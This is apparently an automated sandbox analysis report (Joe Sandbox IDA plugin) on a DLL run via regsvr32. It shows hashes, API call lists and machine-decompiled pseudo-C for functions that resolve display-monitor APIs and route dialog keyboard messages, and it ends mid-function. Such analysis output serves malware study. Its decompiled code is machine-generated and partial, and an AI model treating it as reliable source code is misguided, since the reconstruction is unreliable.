                                                                                                                • Opcode ID: f51054db1346af9c0a42a6bc3f4aa064ca6629e0ca86298902cef89b362c1939
                                                                                                                • Instruction ID: a5a35e27e5f5d6e8fa5b1653bb3fae5833f6c0cc24fded47811104412f164aaa
                                                                                                                • Opcode Fuzzy Hash: f51054db1346af9c0a42a6bc3f4aa064ca6629e0ca86298902cef89b362c1939
                                                                                                                • Instruction Fuzzy Hash: B8510371A00649EFDF11DFA9DD89DAFBBB9FF88740F404119F106A2165EB74AA40DB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E100174A2() {
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t5;
                                                                                                                				_Unknown_base(*)()* _t6;
                                                                                                                				_Unknown_base(*)()* _t7;
                                                                                                                				_Unknown_base(*)()* _t8;
                                                                                                                				_Unknown_base(*)()* _t9;
                                                                                                                				_Unknown_base(*)()* _t10;
                                                                                                                				_Unknown_base(*)()* _t11;
                                                                                                                				_Unknown_base(*)()* _t12;
                                                                                                                				struct HINSTANCE__* _t18;
                                                                                                                				void* _t20;
                                                                                                                				intOrPtr _t23;
                                                                                                                				_Unknown_base(*)()* _t24;
                                                                                                                
                                                                                                                				_t23 =  *0x10070964; // 0x0
                                                                                                                				if(_t23 == 0) {
                                                                                                                					_push(_t20);
                                                                                                                					 *0x10070968 = E1001744A(0, _t20, __eflags);
                                                                                                                					_t18 = GetModuleHandleA("USER32");
                                                                                                                					__eflags = _t18;
                                                                                                                					if(_t18 == 0) {
                                                                                                                						L12:
                                                                                                                						 *0x10070948 = 0;
                                                                                                                						 *0x1007094c = 0;
                                                                                                                						 *0x10070950 = 0;
                                                                                                                						 *0x10070954 = 0;
                                                                                                                						 *0x10070958 = 0;
                                                                                                                						 *0x1007095c = 0;
                                                                                                                						 *0x10070960 = 0;
                                                                                                                						_t5 = 0;
                                                                                                                					} else {
                                                                                                                						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                                						__eflags = _t6;
                                                                                                                						 *0x10070948 = _t6;
                                                                                                                						if(_t6 == 0) {
                                                                                                                							goto L12;
                                                                                                                						} else {
                                                                                                                							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                                							__eflags = _t7;
                                                                                                                							 *0x1007094c = _t7;
                                                                                                                							if(_t7 == 0) {
                                                                                                                								goto L12;
                                                                                                                							} else {
                                                                                                                								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                                								__eflags = _t8;
                                                                                                                								 *0x10070950 = _t8;
                                                                                                                								if(_t8 == 0) {
                                                                                                                									goto L12;
                                                                                                                								} else {
                                                                                                                									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                                									__eflags = _t9;
                                                                                                                									 *0x10070954 = _t9;
                                                                                                                									if(_t9 == 0) {
                                                                                                                										goto L12;
                                                                                                                									} else {
                                                                                                                										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                                										__eflags = _t10;
                                                                                                                										 *0x1007095c = _t10;
                                                                                                                										if(_t10 == 0) {
                                                                                                                											goto L12;
                                                                                                                										} else {
                                                                                                                											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                                											__eflags = _t11;
                                                                                                                											 *0x10070958 = _t11;
                                                                                                                											if(_t11 == 0) {
                                                                                                                												goto L12;
                                                                                                                											} else {
                                                                                                                												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                                												__eflags = _t12;
                                                                                                                												 *0x10070960 = _t12;
                                                                                                                												if(_t12 == 0) {
                                                                                                                													goto L12;
                                                                                                                												} else {
                                                                                                                													_t5 = 1;
                                                                                                                													__eflags = 1;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *0x10070964 = 1;
                                                                                                                					return _t5;
                                                                                                                				} else {
                                                                                                                					_t24 =  *0x10070958; // 0x0
                                                                                                                					return 0 | _t24 != 0x00000000;
                                                                                                                				}
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,100175EE,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 100174CB
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 100174E7
                                                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 100174F8
                                                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 10017509
                                                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 1001751A
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 1001752B
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 1001753C
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 1001754D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                • API String ID: 667068680-68207542
                                                                                                                • Opcode ID: a20aa693765952c3ce02af2ba826866ad19c6fce50844deeb2fac3525745aa1f
                                                                                                                • Instruction ID: bc28950aa46df5d8222b74f3111ac3ccdac73160ea32c20ebd40e5cba97e4541
                                                                                                                • Opcode Fuzzy Hash: a20aa693765952c3ce02af2ba826866ad19c6fce50844deeb2fac3525745aa1f
                                                                                                                • Instruction Fuzzy Hash: CA213E78902762DAF782DF2A8CC046ABBF5F349240751073EF248F6651D77984C5DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100377FA(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v24;
                                                                                                                				int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				struct HWND__* _v52;
                                                                                                                				signed int _t139;
                                                                                                                				signed int _t141;
                                                                                                                				void* _t142;
                                                                                                                				signed int _t146;
                                                                                                                				signed int _t149;
                                                                                                                				intOrPtr _t150;
                                                                                                                				signed int _t152;
                                                                                                                				signed char _t153;
                                                                                                                				signed int _t154;
                                                                                                                				signed int _t155;
                                                                                                                				int _t156;
                                                                                                                				signed int _t161;
                                                                                                                				signed int _t165;
                                                                                                                				void* _t167;
                                                                                                                				signed char _t171;
                                                                                                                				signed int _t172;
                                                                                                                				signed int _t173;
                                                                                                                				signed int _t174;
                                                                                                                				signed char _t182;
                                                                                                                				intOrPtr _t183;
                                                                                                                				signed int _t184;
                                                                                                                				short _t188;
                                                                                                                				signed int _t189;
                                                                                                                				signed int _t190;
                                                                                                                				signed int _t191;
                                                                                                                				signed int _t195;
                                                                                                                				signed int _t198;
                                                                                                                				signed char _t199;
                                                                                                                				signed int _t200;
                                                                                                                				signed int _t201;
                                                                                                                				short _t204;
                                                                                                                				signed int _t206;
                                                                                                                				signed int _t207;
                                                                                                                				signed int _t208;
                                                                                                                				signed int _t209;
                                                                                                                				void* _t211;
                                                                                                                				signed int _t215;
                                                                                                                				signed int _t216;
                                                                                                                				struct HWND__* _t217;
                                                                                                                				struct tagMSG* _t221;
                                                                                                                				intOrPtr _t224;
                                                                                                                				void* _t231;
                                                                                                                				void* _t234;
                                                                                                                				struct tagMSG* _t240;
                                                                                                                				signed int _t242;
                                                                                                                				int _t243;
                                                                                                                				signed int _t244;
                                                                                                                				long _t247;
                                                                                                                				intOrPtr _t249;
                                                                                                                				signed int _t251;
                                                                                                                				signed int _t254;
                                                                                                                				signed int _t255;
                                                                                                                				signed int _t256;
                                                                                                                				signed int _t257;
                                                                                                                				signed int _t258;
                                                                                                                				void* _t260;
                                                                                                                				void* _t262;
                                                                                                                
                                                                                                                				_t232 = __ecx;
                                                                                                                				_t260 = _t262;
                                                                                                                				_push(__ecx);
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_push(__ebx);
                                                                                                                				_push(__esi);
                                                                                                                				_push(__edi);
                                                                                                                				_t139 = E10037657(_a4, _a8);
                                                                                                                				_t238 = _t139;
                                                                                                                				if(_t139 == 0) {
                                                                                                                					_t232 = _a4;
                                                                                                                					_t231 = E10018429(_a4);
                                                                                                                					if(_t231 != 0) {
                                                                                                                						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                                                                                						_a8 = _t221;
                                                                                                                						if(_t221 != 0) {
                                                                                                                							while(1) {
                                                                                                                								_t9 = _t231 + 0x40; // 0x40
                                                                                                                								_t232 = _t9;
                                                                                                                								_t258 =  *(E100182A6( &_a8));
                                                                                                                								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                                                                                								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                                                                                									if(_a8 != 0) {
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								goto L10;
                                                                                                                							}
                                                                                                                							_t238 = _t258;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L10:
                                                                                                                				_t247 = 0;
                                                                                                                				while(1) {
                                                                                                                					_t238 = E100376A9(_t232, _a4, _t238, _a12);
                                                                                                                					if(_t238 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					_t142 = E10037154(_t238);
                                                                                                                					_pop(_t232);
                                                                                                                					if(_t142 == 0) {
                                                                                                                						L14:
                                                                                                                						if(_t238 == 0) {
                                                                                                                							L21:
                                                                                                                							__eflags =  *(_t238 + 4);
                                                                                                                							if(__eflags == 0) {
                                                                                                                								E1001729E(0, _t232, _t238, _t247, __eflags);
                                                                                                                								asm("int3");
                                                                                                                								_push(0x28);
                                                                                                                								E1003D219(E10054CF8, 0, _t238, _t247);
                                                                                                                								_t146 = _a4;
                                                                                                                								__eflags = _t146;
                                                                                                                								if(_t146 != 0) {
                                                                                                                									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                                                                                								} else {
                                                                                                                									_v48 = _v48 & _t146;
                                                                                                                								}
                                                                                                                								_t240 = _a8;
                                                                                                                								_t249 = _t240->message;
                                                                                                                								_v32 = _t249;
                                                                                                                								_v52 = GetFocus();
                                                                                                                								_t149 = E10019C16(0, _t232, _t260, _t148);
                                                                                                                								_t229 = 0x100;
                                                                                                                								__eflags = _t249 - 0x100;
                                                                                                                								_v24 = _t149;
                                                                                                                								if(_t249 < 0x100) {
                                                                                                                									L34:
                                                                                                                									__eflags = _t249 + 0xfffffe00 - 9;
                                                                                                                									if(_t249 + 0xfffffe00 > 9) {
                                                                                                                										goto L56;
                                                                                                                									} else {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									__eflags = _t249 - 0x109;
                                                                                                                									if(_t249 <= 0x109) {
                                                                                                                										L35:
                                                                                                                										__eflags = _t149;
                                                                                                                										if(_t149 == 0) {
                                                                                                                											L56:
                                                                                                                											_t251 = 0;
                                                                                                                											_v28 = 0;
                                                                                                                											_t150 = E10019C16(_t229, _t232, _t260,  *_t240);
                                                                                                                											_v44 = _v44 & 0;
                                                                                                                											_v36 = _t150;
                                                                                                                											_t152 = _v32 - _t229;
                                                                                                                											__eflags = _t152;
                                                                                                                											_v40 = 2;
                                                                                                                											if(_t152 == 0) {
                                                                                                                												_t153 = E10037107(_v36, _t240);
                                                                                                                												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                												__eflags = _t232 - 0x1b;
                                                                                                                												if(__eflags > 0) {
                                                                                                                													__eflags = _t232 - 0x25;
                                                                                                                													if(_t232 < 0x25) {
                                                                                                                														goto L75;
                                                                                                                													} else {
                                                                                                                														__eflags = _t232 - 0x26;
                                                                                                                														if(_t232 <= 0x26) {
                                                                                                                															_v44 = 1;
                                                                                                                															goto L110;
                                                                                                                														} else {
                                                                                                                															__eflags = _t232 - 0x28;
                                                                                                                															if(_t232 <= 0x28) {
                                                                                                                																L110:
                                                                                                                																_t171 = E10037107(_v24, _t240);
                                                                                                                																__eflags = _t171 & 0x00000001;
                                                                                                                																if((_t171 & 0x00000001) != 0) {
                                                                                                                																	goto L75;
                                                                                                                																} else {
                                                                                                                																	__eflags = _v44;
                                                                                                                																	_t232 = _a4;
                                                                                                                																	_push(0);
                                                                                                                																	if(_v44 == 0) {
                                                                                                                																		_t172 = E1001DBD2(_t229, _t232, _t240);
                                                                                                                																	} else {
                                                                                                                																		_t172 = E1001DB84(_t229, _t232, _t240);
                                                                                                                																	}
                                                                                                                																	_t254 = _t172;
                                                                                                                																	__eflags = _t254;
                                                                                                                																	if(_t254 == 0) {
                                                                                                                																		goto L75;
                                                                                                                																	} else {
                                                                                                                																		__eflags =  *(_t254 + 8);
                                                                                                                																		if( *(_t254 + 8) != 0) {
                                                                                                                																			_t232 = _a4;
                                                                                                                																			E1001D72E(_a4, _t254);
                                                                                                                																		}
                                                                                                                																		__eflags =  *(_t254 + 4);
                                                                                                                																		if( *(_t254 + 4) == 0) {
                                                                                                                																			_t173 =  *_t254;
                                                                                                                																			__eflags = _t173;
                                                                                                                																			if(_t173 == 0) {
                                                                                                                																				_t232 = _a4;
                                                                                                                																				_t174 = E100371C5(_a4, _v24, _v44);
                                                                                                                																			} else {
                                                                                                                																				_t174 = E10019C16(_t229, _t232, _t260, _t173);
                                                                                                                																			}
                                                                                                                																			_t242 = _t174;
                                                                                                                																			__eflags = _t242;
                                                                                                                																			if(_t242 == 0) {
                                                                                                                																				goto L75;
                                                                                                                																			} else {
                                                                                                                																				_t229 = 0;
                                                                                                                																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                                                                                																				E100371FF(_t242);
                                                                                                                																				__eflags =  *(_t254 + 8);
                                                                                                                																				if( *(_t254 + 8) != 0) {
                                                                                                                																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                                                                                																				}
                                                                                                                																				goto L125;
                                                                                                                																			}
                                                                                                                																		} else {
                                                                                                                																			_t232 =  *(_t254 + 4);
                                                                                                                																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                                                                                																			goto L125;
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															} else {
                                                                                                                																__eflags = _t232 - 0x2b;
                                                                                                                																if(_t232 != 0x2b) {
                                                                                                                																	goto L75;
                                                                                                                																} else {
                                                                                                                																	goto L97;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                													goto L126;
                                                                                                                												} else {
                                                                                                                													if(__eflags == 0) {
                                                                                                                														L103:
                                                                                                                														_t243 = 0;
                                                                                                                														__eflags = 0;
                                                                                                                														goto L104;
                                                                                                                													} else {
                                                                                                                														__eflags = _t232 - 3;
                                                                                                                														if(_t232 == 3) {
                                                                                                                															goto L103;
                                                                                                                														} else {
                                                                                                                															__eflags = _t232 - 9;
                                                                                                                															if(_t232 == 9) {
                                                                                                                																__eflags = _t153 & 0x00000002;
                                                                                                                																if((_t153 & 0x00000002) != 0) {
                                                                                                                																	goto L75;
                                                                                                                																} else {
                                                                                                                																	_t188 = GetKeyState(0x10);
                                                                                                                																	_t255 = _a4;
                                                                                                                																	__eflags = _t188;
                                                                                                                																	_t229 = 0 | _t188 < 0x00000000;
                                                                                                                																	_t232 = _t255;
                                                                                                                																	_t189 = E1001D5EB(_t255, 0, _t188 < 0);
                                                                                                                																	__eflags = _t189;
                                                                                                                																	if(_t189 == 0) {
                                                                                                                																		goto L75;
                                                                                                                																	} else {
                                                                                                                																		__eflags =  *(_t189 + 4);
                                                                                                                																		if( *(_t189 + 4) == 0) {
                                                                                                                																			_t190 =  *_t189;
                                                                                                                																			__eflags = _t190;
                                                                                                                																			if(_t190 == 0) {
                                                                                                                																				_t232 = _t255;
                                                                                                                																				_t191 = E10020DC4(_t255, _v36, _t229);
                                                                                                                																			} else {
                                                                                                                																				_t191 = E10019C16(_t229, _t232, _t260, _t190);
                                                                                                                																			}
                                                                                                                																			_t244 = _t191;
                                                                                                                																			__eflags = _t244;
                                                                                                                																			if(_t244 != 0) {
                                                                                                                																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                                                                                																				E100371FF(_t244);
                                                                                                                																				E100373C9(_t229, _t232, _t260, _v24, _t244);
                                                                                                                																				_pop(_t232);
                                                                                                                																			}
                                                                                                                																		} else {
                                                                                                                																			_t195 =  *(_t189 + 4);
                                                                                                                																			_t232 = _t195;
                                                                                                                																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                                                                                																		}
                                                                                                                																		goto L125;
                                                                                                                																	}
                                                                                                                																}
                                                                                                                																goto L126;
                                                                                                                															} else {
                                                                                                                																__eflags = _t232 - 0xd;
                                                                                                                																if(_t232 == 0xd) {
                                                                                                                																	L97:
                                                                                                                																	__eflags = _t153 & 0x00000004;
                                                                                                                																	if((_t153 & 0x00000004) != 0) {
                                                                                                                																		goto L75;
                                                                                                                																	} else {
                                                                                                                																		_t182 = E100371A4(_v24);
                                                                                                                																		__eflags = _t182 & 0x00000010;
                                                                                                                																		_pop(_t232);
                                                                                                                																		if((_t182 & 0x00000010) == 0) {
                                                                                                                																			_t183 = E1003754A(_a4);
                                                                                                                																		} else {
                                                                                                                																			_t251 = _v24;
                                                                                                                																			_t232 = _t251;
                                                                                                                																			_t183 = E1001D305(_t251);
                                                                                                                																		}
                                                                                                                																		_t243 = 0;
                                                                                                                																		__eflags = _t251;
                                                                                                                																		_v40 = _t183;
                                                                                                                																		if(_t251 != 0) {
                                                                                                                																			L105:
                                                                                                                																			_t232 = _t251;
                                                                                                                																			_t184 = E1001D37F(_t251);
                                                                                                                																			__eflags = _t184;
                                                                                                                																			if(_t184 != 0) {
                                                                                                                																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                                                                                																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                                                                                																					goto L75;
                                                                                                                																				} else {
                                                                                                                																					_push(_t243);
                                                                                                                																					_push(_t243);
                                                                                                                																					_push(_t243);
                                                                                                                																					_push(1);
                                                                                                                																					_push(0xfffffdd9);
                                                                                                                																					_push(_t251);
                                                                                                                																					_v8 = _t243;
                                                                                                                																					E1001D3DC();
                                                                                                                																					_v8 = _v8 | 0xffffffff;
                                                                                                                																					goto L125;
                                                                                                                																				}
                                                                                                                																			} else {
                                                                                                                																				MessageBeep(_t243);
                                                                                                                																				goto L75;
                                                                                                                																			}
                                                                                                                																		} else {
                                                                                                                																			L104:
                                                                                                                																			_t251 = E10037444(_a4, _v40);
                                                                                                                																			__eflags = _t251 - _t243;
                                                                                                                																			if(_t251 == _t243) {
                                                                                                                																				goto L75;
                                                                                                                																			} else {
                                                                                                                																				goto L105;
                                                                                                                																			}
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																	goto L126;
                                                                                                                																} else {
                                                                                                                																	goto L75;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                												goto L79;
                                                                                                                											} else {
                                                                                                                												_t198 = _t152;
                                                                                                                												__eflags = _t198;
                                                                                                                												if(_t198 == 0) {
                                                                                                                													L62:
                                                                                                                													_t199 = E10037107(_v36, _t240);
                                                                                                                													__eflags = _v32 - 0x102;
                                                                                                                													if(_v32 != 0x102) {
                                                                                                                														L64:
                                                                                                                														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                														__eflags = _t232 - 9;
                                                                                                                														if(_t232 != 9) {
                                                                                                                															L66:
                                                                                                                															__eflags = _t232 - 0x20;
                                                                                                                															if(__eflags == 0) {
                                                                                                                																goto L54;
                                                                                                                															} else {
                                                                                                                																_push(_t240);
                                                                                                                																_t200 = E100377FA(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                                                                                																__eflags = _t200;
                                                                                                                																if(_t200 == 0) {
                                                                                                                																	goto L75;
                                                                                                                																} else {
                                                                                                                																	_t201 =  *(_t200 + 4);
                                                                                                                																	__eflags = _t201;
                                                                                                                																	if(_t201 == 0) {
                                                                                                                																		goto L75;
                                                                                                                																	} else {
                                                                                                                																		_t232 = _t201;
                                                                                                                																		E1002EE50(_t201, _t240);
                                                                                                                																		L125:
                                                                                                                																		_v28 = 1;
                                                                                                                																	}
                                                                                                                																}
                                                                                                                																goto L79;
                                                                                                                															}
                                                                                                                														} else {
                                                                                                                															__eflags = _t199 & 0x00000002;
                                                                                                                															if((_t199 & 0x00000002) != 0) {
                                                                                                                																goto L75;
                                                                                                                															} else {
                                                                                                                																goto L66;
                                                                                                                															}
                                                                                                                														}
                                                                                                                													} else {
                                                                                                                														__eflags = _t199 & 0x00000084;
                                                                                                                														if((_t199 & 0x00000084) != 0) {
                                                                                                                															goto L75;
                                                                                                                														} else {
                                                                                                                															goto L64;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													__eflags = _t198 != 4;
                                                                                                                													if(_t198 != 4) {
                                                                                                                														L75:
                                                                                                                														_t154 = _a4;
                                                                                                                														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                                                                                														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                                                                                															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                                                                                															__eflags = _t165;
                                                                                                                															_v28 = _t165;
                                                                                                                															if(_t165 != 0) {
                                                                                                                																_t167 = E10019C16(_t229, _t232, _t260, GetFocus());
                                                                                                                																__eflags = _t167 - _v24;
                                                                                                                																if(_t167 != _v24) {
                                                                                                                																	E1003735C(_t232, E10019C16(_t229, _t232, _t260, GetFocus()));
                                                                                                                																	_pop(_t232);
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                														L79:
                                                                                                                														_t155 = IsWindow(_v52);
                                                                                                                														__eflags = _t155;
                                                                                                                														if(_t155 != 0) {
                                                                                                                															E100373C9(_t229, _t232, _t260, _v24, E10019C16(_t229, _t232, _t260, GetFocus()));
                                                                                                                															_pop(_t234);
                                                                                                                															_t161 = IsWindow(_v48);
                                                                                                                															__eflags = _t161;
                                                                                                                															if(_t161 != 0) {
                                                                                                                																E10037577(_a4, _v24, E10019C16(_t229, _t234, _t260, GetFocus()));
                                                                                                                															}
                                                                                                                														}
                                                                                                                														_t156 = _v28;
                                                                                                                													} else {
                                                                                                                														__eflags = _v24;
                                                                                                                														if(_v24 != 0) {
                                                                                                                															L61:
                                                                                                                															__eflags =  *(_t240 + 8) - 0x20;
                                                                                                                															if( *(_t240 + 8) == 0x20) {
                                                                                                                																goto L75;
                                                                                                                															} else {
                                                                                                                																goto L62;
                                                                                                                															}
                                                                                                                														} else {
                                                                                                                															_t204 = GetKeyState(0x12);
                                                                                                                															__eflags = _t204;
                                                                                                                															if(_t204 >= 0) {
                                                                                                                																goto L75;
                                                                                                                															} else {
                                                                                                                																goto L61;
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											_t256 = _t149;
                                                                                                                											while(1) {
                                                                                                                												__eflags =  *(_t256 + 0x50);
                                                                                                                												if( *(_t256 + 0x50) != 0) {
                                                                                                                													break;
                                                                                                                												}
                                                                                                                												_t211 = E10019C16(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                												__eflags = _t211 - _a4;
                                                                                                                												if(_t211 != _a4) {
                                                                                                                													_t256 = E10019C16(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                													__eflags = _t256;
                                                                                                                													if(_t256 != 0) {
                                                                                                                														continue;
                                                                                                                													}
                                                                                                                												}
                                                                                                                												break;
                                                                                                                											}
                                                                                                                											__eflags = _t256;
                                                                                                                											if(_t256 == 0) {
                                                                                                                												L45:
                                                                                                                												__eflags = _v32 - 0x101;
                                                                                                                												if(_v32 == 0x101) {
                                                                                                                													L48:
                                                                                                                													__eflags = _t256;
                                                                                                                													if(_t256 == 0) {
                                                                                                                														goto L55;
                                                                                                                													} else {
                                                                                                                														_t257 =  *(_t256 + 0x50);
                                                                                                                														__eflags = _t257;
                                                                                                                														if(_t257 == 0) {
                                                                                                                															goto L55;
                                                                                                                														} else {
                                                                                                                															_t206 = _a8->wParam & 0x0000ffff;
                                                                                                                															__eflags = _t206 - 0xd;
                                                                                                                															if(_t206 != 0xd) {
                                                                                                                																L52:
                                                                                                                																__eflags = _t206 - 0x1b;
                                                                                                                																if(_t206 != 0x1b) {
                                                                                                                																	goto L55;
                                                                                                                																} else {
                                                                                                                																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                                                                                																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                                                                                																		goto L55;
                                                                                                                																	} else {
                                                                                                                																		goto L54;
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															} else {
                                                                                                                																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                                                                                																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                                                                                																	L54:
                                                                                                                																	_t156 = 0;
                                                                                                                																} else {
                                                                                                                																	goto L52;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													__eflags = _v32 - _t229;
                                                                                                                													if(_v32 == _t229) {
                                                                                                                														goto L48;
                                                                                                                													} else {
                                                                                                                														__eflags = _v32 - 0x102;
                                                                                                                														if(_v32 != 0x102) {
                                                                                                                															L55:
                                                                                                                															_t240 = _a8;
                                                                                                                															goto L56;
                                                                                                                														} else {
                                                                                                                															goto L48;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t207 =  *(_t256 + 0x50);
                                                                                                                												__eflags = _t207;
                                                                                                                												if(_t207 == 0) {
                                                                                                                													goto L45;
                                                                                                                												} else {
                                                                                                                													__eflags =  *(_t207 + 0x58);
                                                                                                                													if( *(_t207 + 0x58) == 0) {
                                                                                                                														goto L45;
                                                                                                                													} else {
                                                                                                                														_t208 =  *(_t207 + 0x58);
                                                                                                                														_t232 =  *_t208;
                                                                                                                														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                                                                                														__eflags = _t209;
                                                                                                                														if(_t209 != 0) {
                                                                                                                															goto L45;
                                                                                                                														} else {
                                                                                                                															_t156 = _t209 + 1;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										goto L34;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								return E1003D2BE(_t156);
                                                                                                                							} else {
                                                                                                                								_t232 =  *(_t238 + 4);
                                                                                                                								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                                                                                								__eflags = _t215 & 0x08000000;
                                                                                                                								if((_t215 & 0x08000000) == 0) {
                                                                                                                									goto L20;
                                                                                                                								} else {
                                                                                                                									goto L23;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t216 =  *(_t238 + 4);
                                                                                                                							if(_t216 == 0) {
                                                                                                                								_t217 =  *_t238;
                                                                                                                							} else {
                                                                                                                								_t217 =  *(_t216 + 0x24);
                                                                                                                							}
                                                                                                                							if(_t217 == 0) {
                                                                                                                								goto L21;
                                                                                                                							} else {
                                                                                                                								if(IsWindowEnabled(_t217) == 0) {
                                                                                                                									L23:
                                                                                                                									__eflags = _t238 - _v8;
                                                                                                                									if(_t238 == _v8) {
                                                                                                                										break;
                                                                                                                									} else {
                                                                                                                										__eflags = _v8;
                                                                                                                										if(_v8 == 0) {
                                                                                                                											_v8 = _t238;
                                                                                                                										}
                                                                                                                										_t247 = _t247 + 1;
                                                                                                                										__eflags = _t247 - 0x200;
                                                                                                                										if(_t247 < 0x200) {
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									L20:
